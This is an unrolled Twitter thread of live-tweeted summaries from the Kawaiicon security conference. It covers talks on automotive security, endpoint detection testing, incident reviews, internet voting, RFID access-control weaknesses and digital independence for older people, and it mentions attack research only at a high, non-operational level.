, 323 tweets, 262 min read
Good morning @kawaiiconNZ!
#Kawaiicon
This seems fine. @kiwicon
#Kawaiicon @kawaiiconNZ
Current status:
#Kawaiicon @kawaiiconNZ @kiwicon
Pretty packed house for #Kawaiicon @kawaiiconNZ...
I'm looking forward to the talk from our first speaker, the @kiwicon alpaca (or is it a llama?).
#Kawaiicon @kawaiiconNZ
And @Metlstorm gets hooked off the stage and replaced by @Sputina!

Long live @kawaiiconNZ!
#Kawaiicon
Its the #Kawaiicon @kawaiiconNZ intro!
Hmmm, it seems to be cut short, I'll post a longer one later...
#Kawaiicon
Nowt it's @runasand talking about Hey Look Ma, We Made It!
#Kawaiicon
Everyone has a different path to where they are today.

Just because your path doesn't look like others doesn't mean you're not a hacker.
#Kawaiicon @runasand
About Runa:
#Kawaiicon @runasand
Investigative reporting is a similar problem set to hacking.

You're both trying to solve hard problems in inventive ways.

#Kawaiicon @runasand
Runa learned to be unapologetic about saying that she's good at what she does.

#Kawaiicon @runasand
Certain careers (doctors, lawyers, etc) follow a very set career path.

InfoSec doesn't have that. There is no set path or the right way to get there.

#Kawaiicon @runasand
Its ok if you don't end up on that set path in life that you think you're supposed to follow.

Do the things you find interesting, the things that excite you, the things that make you happy.

#Kawaiicon @runasand
If something doesn't work for you in life, then you pivot.

We can create the jobs that we want.

#Kawaiicon @runasand
You can't just give someone tools (like Tor) without providing them with an educational foundation in information security.

The idea that they needed to provide reporters with this training wasn't something that anyone was asking for.
#Kawaiicon @runasand
Car hacking wasn't a thing that existed until some folks started hacking cars.

By identifying that gap they created new and interesting jobs that didn't exist before.

And a couple other examples

#Kawaiicon @runasand
NYT complained about being able to setup SecureDrop and other issues in the newsroom and Runa said "you should hire me to solve that"

Nek minnit...
#Kawaiicon @runasand
Runa built rapport with the newsroom team via competitive phishing exercises (who was getting pwned).

They loved it!

#Kawaiicon @runasand
Runa's current mission is for all journalists to work securely.

#Kawaiicon @runasand
How @nytimes is securing their newsrooms.

#Kawaiicon @runasand
You have to create solutions that don't block the work that is happening.

You don't want your pedantic security demands to block the story going on page 1.

#Kawaiicon @runasand
If you believe your story is a Pulitzer Prize winning story, you're going to be open to taking a lot more risks.

How do enable that but still maintain security?

#Kawaiicon @runasand
Previously there was no way for someone to contact the NYTimes (as a newsroom), so they built one.

#Kawaiicon @runasand
You can replace "journalists" with "hackers" or almost any other profession.

We often strongly identify with the work that we do.

Is what I'm doing now in line with what I want to achieve? Does it make me happy? If yes, great! If no, reconsider.

#Kawaiicon @runasand @mjenkins
Alone we can do so little; together we can do so much.

#Kawaiicon @runasand
Runa wants to know what you're up to.

Please share with her over the next couple days and share with each other.

#Kawaiicon @runasand
Next up, it's Gutmann talking about Automotive Control Security!
#Kawaiicon
Hello Peter!

#Kawaiicon
Automotive Controls = everything is awful.

#Kawaiicon
Lots of cars are basically all computer now.

#Kawaiicon
Easiest attack vector is via Bluetooth in the head unit

#Kawaiicon
All of this is not good.
#Kawaiicon
Primary goal is dependability.

Trust is different in automotive systems.

Dependable system can fault, but is mitigated.

#Kawaiicon
Only when fault = failure means there is s visible error.

Many fault mitigations in place.

#Kawaiicon
Mitigations:
#Kawaiicon
Fault tolerance: basically the opposite of what crypto/security does.

#Kawaiicon
Fault mitigation vs security:
#Kawaiicon
The AUTOSAR System
#Kawaiicon
Moar AUTOSAR Environment:
#Kawaiicon
And... Moar AUTOSAR Environment:
#Kawaiicon
Gutmann!
#Kawaiicon
Basically they use a lot of super low power CPUs.
#Kawaiicon
Moores Law doesn't apply.

#Kawaiicon
Design for product life of 10-20 years...
#Kawaiicon
Large barriers to getting "shiny new things"
#Kawaiicon
Crypto resources.

Unless you want to use AES you're fucked.

#Kawaiicon
Design our own crypto! 🙄
#Kawaiicon
No idea.
#Kawaiicon
AHHHHH!
#Kawaiicon
"Let me tell you a story"
#Kawaiicon
What a car really is.

Assume the head unit will never be secure so isolate it.
#Kawaiicon
Difficult to identify where any kind of car attack makes sense.

#Kawaiicon
Attacks on cars also have to be local.

And then what?

#Kawaiicon
Other kinds of mess:
#Kawaiicon
So basically:

Don't let cryptogeeks play without adult supervision!
#Kawaiicon
A wee bit busy...
#Kawaiicon
They're all good stickers, Bront.
#Kawaiicon
Who are all these people outside?

That's where the solar radiation is...
@_devalias #Kawaiicon
Current status:
#Kawaiicon
Next up, a talk on Endpoint Detection.
#Kawaiicon
I spy... A wild @mikeforbes in the bigfoot pose.
#Kawaiicon
Now its @pink_tangent talking about Endpoint Security.
At Honda they had a ransomware incident. She was involved with remediation - it was a 5 day recovery.

#Kawaiicon @pink_tangent
Remediation cost approx quarter of a mil...

Remediation isn't cheap. And it happens repeatedly.

#Kawaiicon @pink_tangent
Some vendors will try and guarantee that if you run their product, you won't get cryptoed.

"If you just put the endpoint security on the file servers, that'll solve the problem!" Nope.
#Kawaiicon @pink_tangent
Evolution of Endpoint AV.
#Kawaiicon @pink_tangent
Then @pink_tangent created her own testing framework.
#Kawaiicon
You need to be requirements focused
#Kawaiicon @pink_tangent
Research timeline
#Kawaiicon @pink_tangent
Testing framework - available on Github.

#Kawaiicon @pink_tangent
Preparation:

Can they support legacy applications?

What about virtual environments?

#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 1: Static Malware
#Kawaiicon #KawaiiconNZ @pink_tangent
Static Analysis Considerations
#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 2a: Dynamic/Execution
#Kawaiicon #KawaiiconNZ @pink_tangent
Powershell script to execute malware!
#Kawaiicon #KawaiiconNZ @pink_tangent
Via Powershell the vendor missed everything. Vis batch script they caught everything... 🤔
#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 2b: Dynamic / Execution with all features turned on

#Kawaiicon #KawaiiconNZ @pink_tangent
Ransomware makes a great test sample because it's very visible.

#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 2 Findings:
#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 3: MITRE ATT&CK framework is awesome.

#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 3: scoring
#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 3: Findings

#Kawaiicon #KawaiiconNZ @pink_tangent
Moar findings: This stuff is hard
#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 4: Business Compatibility
Deploy to your environment and just see what it comes up with over a few months.

Test it in silent mode so you get reporting but it doesn't kill your apps

Needs asset archiving

#Kawaiicon #KawaiiconNZ @pink_tangent
Key takeaways:

There is no silver bullet.

#Kawaiicon #KawaiiconNZ @pink_tangent
And Courtney is there to talk about... Incident response!
#Kawaiicon #KawaiiconNZ
The Mechanics of Being Good to Each Other.
#Kawaiicon #KawaiiconNZ @hashoctothorpe
Who doesn't like a good disaster where nobody dies?
#Kawaiicon #KawaiiconNZ @hashoctothorpe
So, here they were blasting the tarmac off the top of this bridge.

They were told not to allow waste water to flow into the lake, so the stored it in the hollow bridge.

But then there was a storm. One pontoon sank & dragged down others...
#Kawaiicon #KawaiiconNZ @hashoctothorpe
Shit is more likely to break when you are fucking with it.
#Kawaiicon #KawaiiconNZ @hashoctothorpe
"We've determined that concrete pontoons don't float when they're filled with water" 🙄
#Kawaiicon #KawaiiconNZ @hashoctothorpe
But this isn't what actually happen:

They had problems keeping up with the pumping schedule.

Some pontoons had more water which caused torsion and the winds twisted the pontoons more. This caused cracks to open and the pontoon to sink.
#Kawaiicon #KawaiiconNZ @hashoctothorpe
Why did the pumping schedule get fucked up? We'll never know.

#Kawaiicon #KawaiiconNZ @hashoctothorpe
No one does things they think will blow up the world*

(*mostly)

#Kawaiicon #KawaiiconNZ @hashoctothorpe
So how do we do better?
#Kawaiicon #KawaiiconNZ @hashoctothorpe
Facilitation: a crash course:

Keep the conversation blame free.

Don't make bad jokes

#Kawaiicon #KawaiiconNZ @hashoctothorpe
You can swear, just not at people.

#Kawaiicon #KawaiiconNZ @hashoctothorpe
Miller's Law:

The key to understanding systems and people with different perspectives than you do.

No two people have experience of the same incident.
#Kawaiicon #KawaiiconNZ @hashoctothorpe
Let's talk about blame.

Things to avoid:
"you"
"why"
And more...

#Kawaiicon #KawaiiconNZ @hashoctothorpe
Example:

This isn't compassionate and it's not helping to identify the problem

#Kawaiicon #KawaiiconNZ @hashoctothorpe
Better things to say.

What questions can we ask to get the longest answer. Different from what we normally want in business.

We are looking for a remediation item.

#Kawaiicon #KawaiiconNZ @hashoctothorpe
Human error is not a root cause.

How were people able to make that error?
#Kawaiicon #KawaiiconNZ @hashoctothorpe
"Try harder" isn't a remediation
#Kawaiicon #KawaiiconNZ @hashoctothorpe
How to have a great meeting:
- Stay on time and on topic
- Practice interrupting (for a good reason)
- Who is talking and who isn't?
- Let's talk about humour (or please don't)
#Kawaiicon #KawaiiconNZ @hashoctothorpe
Getting it wrong makes people feel uncomfortable.

Avoid:
#Kawaiicon #KawaiiconNZ @hashoctothorpe
You probably can say:
#Kawaiicon #KawaiiconNZ @hashoctothorpe
If you mess up, apologise and move on.
#Kawaiicon #KawaiiconNZ @hashoctothorpe
You don't have to be witty

#Kawaiicon #KawaiiconNZ @hashoctothorpe
If someone makes a bad joke just say:

Then move on & never bring it up again.

#Kawaiicon #KawaiiconNZ @hashoctothorpe
In 2019 we don't need more ways to be separated and divided from our peers. We need to move forward and make better mistakes together

#Kawaiicon #KawaiiconNZ @hashoctothorpe
Now we're talking Aliz about Gargoyle.

#Kawaiicon #KawaiiconNZ
WTF is Gargoyle?

Hiding malicious code in bit of memory that is not executable.

#Kawaiicon #KawaiiconNZ
Dormant with no executable code until...
#Kawaiicon #KawaiiconNZ
What is Gargoyle?
#Kawaiicon #KawaiiconNZ
How do we detect Gargoyle?

No documented way
#Kawaiicon #KawaiiconNZ
But... We can use Volatility!
#Kawaiicon #KawaiiconNZ
Detection:
Script works ok, but is very manual.
#Kawaiicon #KawaiiconNZ
Automation can get over the top. Otherwise you can end up just handing people a "magic box that stops the hackers"
#Kawaiicon #KawaiiconNZ
Use an emulation agent!

Unicorn Engine!
#Kawaiicon #KawaiiconNZ
Now with sweet scripts!
#Kawaiicon #KawaiiconNZ
In summary:

Now we can detect this, and so can you!

Thanks @AlizTheHax0r!
#Kawaiicon #KawaiiconNZ
Now, lunchtime!

Who let this old guy on stage?

Apparently there is a code brown?!

A risk register line item that has never been activated before!

#Kawaiicon #KawaiiconNZ @Metlstorm
Oh, the humanity!
#Kawaiicon #KawaiiconNZ
Perfect con lunch pozzie.
#Kawaiicon #KawaiiconNZ
Current status:
#Kawaiicon #KawaiiconNZ
Now @Sputina is kicking off the afternoon!
#Kawaiicon #KawaiiconNZ
Now Chris is telling us about internet voting systems
#Kawaiicon #KawaiiconNZ
What do we want from a voting system?

#Kawaiicon #KawaiiconNZ
Verifiability isn't just to demonstrate correctness, it's to ensure a peaceful transfer of power.

The loser can be show that the results are false.

#Kawaiicon #KawaiiconNZ
The thing that most government departments do not want to happen is to become a hashtag.

They will do almost anything to avoid it.

#Kawaiicon #KawaiiconNZ
Two kinds of voting:
Supervised (the government is responsible for the validity of your vote) vs remote (you're responsible for validity of your vote)
#Kawaiicon #KawaiiconNZ
Supervised vs remote voting

Should responsibility be on the state or the individual?
#Kawaiicon #KawaiiconNZ
Postal vs internet voting

Difference is in the scale of the require conspiracy.

#Kawaiicon #KawaiiconNZ
But that doesn't dissuade the push for internet voting.

Argument is it will cause increased turnout. But that hasn't played out in reality.

#Kawaiicon #KawaiiconNZ
No evidence that internet voting will increase turnout.

More likely your disenfranchise a cohort without easy access to the internet.

#Kawaiicon #KawaiiconNZ
What verifiability do we need from electronic voting?

Need individual verifiability & universal verifiability (so everyone knows that all the votes were correctly counted).

#Kawaiicon #KawaiiconNZ
The problem is that we have to rely on paper for the intrinsic commitments.

#Kawaiicon #KawaiiconNZ
Internet voting conceptually:

Doesn't offer what we want.

So why are we still deploying it?

#Kawaiicon #KawaiiconNZ
Internet voting deployments.

These are all done by Scytl - but nobody knows who they're owned by and people who look into it get shut down quickly. 😳

References to @SarahJamieLewis
& @VTeagueAus
#Kawaiicon #KawaiiconNZ
Lots of security concerns...

They opened up the central voting system to Scytl because there were "performances problems".

Please. No.

#Kawaiicon #KawaiiconNZ
When they went to deploy it in Western Australia...

They were sharing a SSL cert with... Lots of orgs.

Lots of bad bad not good.

#Kawaiicon #KawaiiconNZ
Just setting a session cookie that profiles the browser.

And they broke the separation principle.

#Kawaiicon #KawaiiconNZ
How is the encryption?

Partial votes are very vulnerable.

#Kawaiicon #KawaiiconNZ
Private key was responding from lots of places...

Auditor says its ok because the vendor is reputable.

But... They were breached over that period.

#Kawaiicon #KawaiiconNZ
And... @Stats_NZ used the same provider. 😬

#Kawaiicon #KawaiiconNZ
For 2019 the Auditors got better.

27 findings, some very critical. And weird redactions.

#Kawaiicon #KawaiiconNZ
Internet voting deployment summary

#Kawaiicon #KawaiiconNZ
Internet voting is a complex problem that is extremely difficult to solve.

#Kawaiicon #KawaiiconNZ
Now @Metlstorm found somebody's credit card...

#Kawaiicon #KawaiiconNZ
Now its @vashta_nerdrada talking us about how to prepare for the unexpected.
#Kawaiicon #KawaiiconNZ
What day is today?

Its 0 - day!

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Let's make a threat model!

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
We tend to be arrogant...

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
"Black Swans" - basically a saying for something impossible.

Now its something impossible that is actually happening

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
What is a black swan?

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
A 🦃 has a black swan experience. It's happily living its life - getting randomly killed is totally unexpected.

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Or this guy... BIG black swan...
#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Don't try and predict black swans - you make make yourself more vulnerable to other black swans

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Security is a by-product of excellence & engineering.

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
0-day all day.

Very quick response from @heroku

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Positives and negatives
#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Where should I invest?

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
So where do I invest the remaining 15%

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Invest in preparedness, not in prediction.

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Black Swans and Blindness

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Harden, test, validate.

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Supply chain verification:
#Kawaiicon #KawaiiconNZ @vashta_nerdrada
How do they secure things at @heroku?

Linux capabilities:
#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Seccomp policies & unprivileged users
#Kawaiicon #KawaiiconNZ @vashta_nerdrada
How does this work with CVEs?

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Quick recap:

Build for resiliency, don't try and predict black swans.

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Now talking about APIC Fail with Oliver
#Kawaiicon #KawaiiconNZ
The what and the why:
#Kawaiicon #KawaiiconNZ
What are we talking about?

#Kawaiicon #KawaiiconNZ
System details:
#Kawaiicon #KawaiiconNZ
Vulnerability no 1
#Kawaiicon #KawaiiconNZ
Attack scenario:
#Kawaiicon #KawaiiconNZ
Uh, you can extract the private key (same on every switch)...

#Kawaiicon #KawaiiconNZ
Exploit chain:

Critical CVE

#Kawaiicon #KawaiiconNZ
Vulnerability no 2:
#Kawaiicon #KawaiiconNZ
Network communication
#Kawaiicon #KawaiiconNZ
And... Vulnerability no 3!
#Kawaiicon #KawaiiconNZ
And.. We've got a buffer overflow!
#Kawaiicon #KawaiiconNZ
Remaining problems:
#Kawaiicon #KawaiiconNZ
Recommendations:

Patch, you fools!

#Kawaiicon #KawaiiconNZ
"Bow to the demo gods!" instructs @Sputina.
#Kawaiicon #KawaiiconNZ
Who let these muppets in?
@rafaelmagu
#Kawaiicon #KawaiiconNZ
In which @Sputina forces us to all get some exercise by making @Metlstorm badger dance.
#Kawaiicon #KawaiiconNZ
Some shit went down between the sheep and that stage light... 🧐
#Kawaiicon #KawaiiconNZ
"Hello, you've reached Alpaca Security Corp."
#Kawaiicon #KawaiiconNZ
And @Sputina opens the evening session
#Kawaiicon #KawaiiconNZ
What is this talk about?

#Kawaiicon #KawaiiconNZ @SophiaFrentz
What is a genome?

What data can we get from it?

#Kawaiicon #KawaiiconNZ @SophiaFrentz
We don't have s lot of data on marginalised groups, but we still try and use it even though our results are bad.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Your DNA is a unique to you sooo... It can't be anonymised...

#Kawaiicon #KawaiiconNZ @SophiaFrentz
How do we do open science but protect end users?

Even if you consent, you're providing info on your immediate family.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Closed science vs Open science:
Pros & Cons

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Genetic discrimination is illegal but so is murder. And it still happens.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
The risk I took was calculated but man, I'm bad at math. 😂
#Kawaiicon #KawaiiconNZ @SophiaFrentz
Does it matter?

Yes.

So, how do we move forward?

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Short intermission to breathe.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Electronic medical records vs physical medical records.

Its not all bad! And electronic medical records provide quick access to information.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
There are plenty of breaches, but nobody is attacking these. It's a design issue.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Where is eHealth going?

We have to consider social issues when creating technical solutions.

With technical solutions we're just amplifying existing social problems.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Why can we do?

- Make responsible individual decisions
- Educating non-sector friends on needs, requirements & values
- Be the squeaky wheel!

#Kawaiicon #KawaiiconNZ @SophiaFrentz
The choice about whether to care if other people see my medical information is MY choice.

Nobody else should be able to make those decisions without the patient's explicit consent.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Now its Matt Daley talking about Access Control on Sesame Street

#Kawaiicon #KawaiiconNZ @SophiaFrentz
How does an RFID card reader work?
#Kawaiicon #KawaiiconNZ
The Gallagher Controller 6000, now known at @kawaiiconNZ as the "Controllagher"
#Kawaiicon #KawaiiconNZ
These are using 386 CPUs...

#Kawaiicon #KawaiiconNZ
What about readers?

New fancy!
#Kawaiicon #KawaiiconNZ
And old ones...

#Kawaiicon #KawaiiconNZ
Thanks FCC for putting all this info online.

With photos.

And internals.

And... Dave's details.

#Kawaiicon #KawaiiconNZ
Why Sesame Street?

That's what Gallagher uses for product code names!

#Kawaiicon #KawaiiconNZ
How do we exploit this?

#Kawaiicon #KawaiiconNZ
Attack via cloud?

#Kawaiicon #KawaiiconNZ
What about the reader?

It hungers for a card... But which one?

#Kawaiicon #KawaiiconNZ
Cards use Weigand Effect

#Kawaiicon #KawaiiconNZ
Sure. Why not?

#Kawaiicon #KawaiiconNZ
Trying to find all of these fields in the zeros and ones.

#Kawaiicon #KawaiiconNZ
Yes, yes. Exactly. What Matt said.

#Kawaiicon #KawaiiconNZ
"This is a simple cypher"
#Kawaiicon #KawaiiconNZ
"And we decode it"
#Kawaiicon #KawaiiconNZ
"Breaking into the roof"

This should be fun! Basically incrementing a field on the card.

#Kawaiicon #KawaiiconNZ
Now let's look at MiFare

#Kawaiicon #KawaiiconNZ
First taste of real crypto using "Crypto 1"
#Kawaiicon #KawaiiconNZ
Let's see how Gallagher is using MIFARE Classic.

Known vulnerability where you can use one key to calculate other keys.

#Kawaiicon #KawaiiconNZ
Let's look in that locked sector!

#Kawaiicon #KawaiiconNZ
So MIFARE Classic is bad, how did they replace it?

LOL all bad.

#Kawaiicon #KawaiiconNZ
So what should we do?

Create a new file based key (not block based).

#Kawaiicon #KawaiiconNZ
This seems fine

#Kawaiicon #KawaiiconNZ
Default site key?

Can we find that?

#Kawaiicon #KawaiiconNZ
Does Matt know? Yes.

Will he tell us? No.

So Gallagher won't do electro-product testing on him.

#Kawaiicon #KawaiiconNZ
Let's look at other fun excitement.

#Kawaiicon #KawaiiconNZ
Can we use an arduino for a timing attack?

#Kawaiicon #KawaiiconNZ
Watching valid/invalid cards and responses messages.

#Kawaiicon #KawaiiconNZ
Can brute force facility code in 4 hrs.

Seems like a while...

#Kawaiicon #KawaiiconNZ
Use Bluno beetle in reader to brute force facility code then play it back on demand.

#Kawaiicon #KawaiiconNZ
Now looking at GBUS.

#Kawaiicon #KawaiiconNZ
Looking at HBUS

Can't just plug in your own malicious controller.

#Kawaiicon #KawaiiconNZ
Validating a new reader.

#Kawaiicon #KawaiiconNZ
Any HBUS vulnerability?

No... For now...

#Kawaiicon #KawaiiconNZ
Now looking at cards.

Old cards just scream out their secret the second they're powered up.

#Kawaiicon #KawaiiconNZ
Forms of Rf-based attack.

Try and intercept the communication between a legit card & reader.

#Kawaiicon #KawaiiconNZ
What happens when the reader talks to the card?

#Kawaiicon #KawaiiconNZ
What happens if some data gets corrupted in the transaction?

Reader says do it again.

#Kawaiicon #KawaiiconNZ
We can guess bad bits.

#Kawaiicon #KawaiiconNZ
We can use software defined radio to sniff card reader interactions

#Kawaiicon #KawaiiconNZ
Reader signals are much stronger than card responses.

#Kawaiicon #KawaiiconNZ
And.. Matt built a massive antenna to read cards from 3 meters...

Not very subtle...

#Kawaiicon #KawaiiconNZ
So none of these are secure unless they're using DESFIRE with a non-default key.

#Kawaiicon #KawaiiconNZ
Testing 95 readers:
#Kawaiicon #KawaiiconNZ
Only one site was using a non-default site key.

And... The NZ Government department didn't appreciate Matt scanning their RFID readers and seized his laptop... 😱

#Kawaiicon #KawaiiconNZ
What can you do?
#Kawaiicon #KawaiiconNZ
Use the security health check!
#Kawaiicon #KawaiiconNZ
Now its @lady_nerd talking about securing people who don't look like you... yet.

#Kawaiicon #KawaiiconNZ
What will we talk about it?

#Kawaiicon #KawaiiconNZ @lady_nerd
Life happens to you while you're busy making other plans.

#Kawaiicon #KawaiiconNZ @lady_nerd
Being security people we tend to judge how people handle their security.

But for other people our advice can be because that advice would be physically difficult or impossible to follow.

#Kawaiicon #KawaiiconNZ @lady_nerd
How do we help people who aren't like us?

#Kawaiicon #KawaiiconNZ @lady_nerd
If all the advice I give is coloured by my knowledge and experiences, it's not going to be effective for people from other experiences.

#Kawaiicon #KawaiiconNZ @lady_nerd
We almost completely dissociate from our one future selves.

If we can't protect our future old selves, how do we protect our elders today?

#Kawaiicon #KawaiiconNZ @lady_nerd
Age doesn't affect us all the same way.

#Kawaiicon #KawaiiconNZ @lady_nerd
We need dynamic security controls in an ever-changing environment to protect us as we age.

#Kawaiicon #KawaiiconNZ @lady_nerd
Should we be digitally active if we can't be independent?

Being digitally active is kind of a human right. It is a substantially increasing part of the day-to-day for all demographics.

#Kawaiicon #KawaiiconNZ @lady_nerd
We need all of these to be happy.

How many of these do we do in the digital space?

Most of them.

#Kawaiicon #KawaiiconNZ @lady_nerd
How do we measure independence?

Diagnostic Frameworks for Daily Living

#Kawaiicon #KawaiiconNZ @lady_nerd
Instrumental Activities of Digital Living - Laura's new framework

#Kawaiicon #KawaiiconNZ @lady_nerd
What do we mean by digitally independent?

#Kawaiicon #KawaiiconNZ @lady_nerd
Links to the project and online assessment.

#Kawaiicon #KawaiiconNZ @lady_nerd
Power of digital attorney and digital guardians are very legally unclear.

#Kawaiicon #KawaiiconNZ @lady_nerd
How can we use this framework?

#Kawaiicon #KawaiiconNZ @lady_nerd
Answers we get can lead to domain specific or holistic solutions.

#Kawaiicon #KawaiiconNZ @lady_nerd
Domain specific responses:
#Kawaiicon #KawaiiconNZ @lady_nerd
Where next?

Mass collection of data!

Lets do a digital independence assessment for a country.

Refine the assessment.

#Kawaiicon #KawaiiconNZ @lady_nerd
Will be linked into opensecurity.nz - a place to find open source information security projects & tools.

#Kawaiicon #KawaiiconNZ @lady_nerd
We're all aging, one day we'll be the people needing help.

#Kawaiicon #KawaiiconNZ @lady_nerd
Awesome talk, thanks @lady_nerd!
#Kawaiicon #KawaiiconNZ
Here is a link to the full @kiwicon/@kawaiiconNZ Day 1 opening:

#Kawaiicon #KawaiiconNZ
And... The Badger Dance featuring @Sputina @Metlstorm and a late appearance by @rafaelmagu:


@kawaiiconNZ #Kawaiicon #KawaiiconNZ
Missing some Tweet in this thread? You can try to force a refresh.

Enjoying this thread?

Keep Current with Jason Danner

Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

Twitter may remove this content at anytime, convert it as a PDF, save and print for later use!

Try unrolling a thread yourself!

how to unroll video

1) Follow Thread Reader App on Twitter so you can easily mention us!

2) Go to a Twitter thread (series of Tweets by the same owner) and mention us with a keyword "unroll" @threadreaderapp unroll

You can practice here first or read more on our help page!

Follow Us on Twitter!

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just three indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!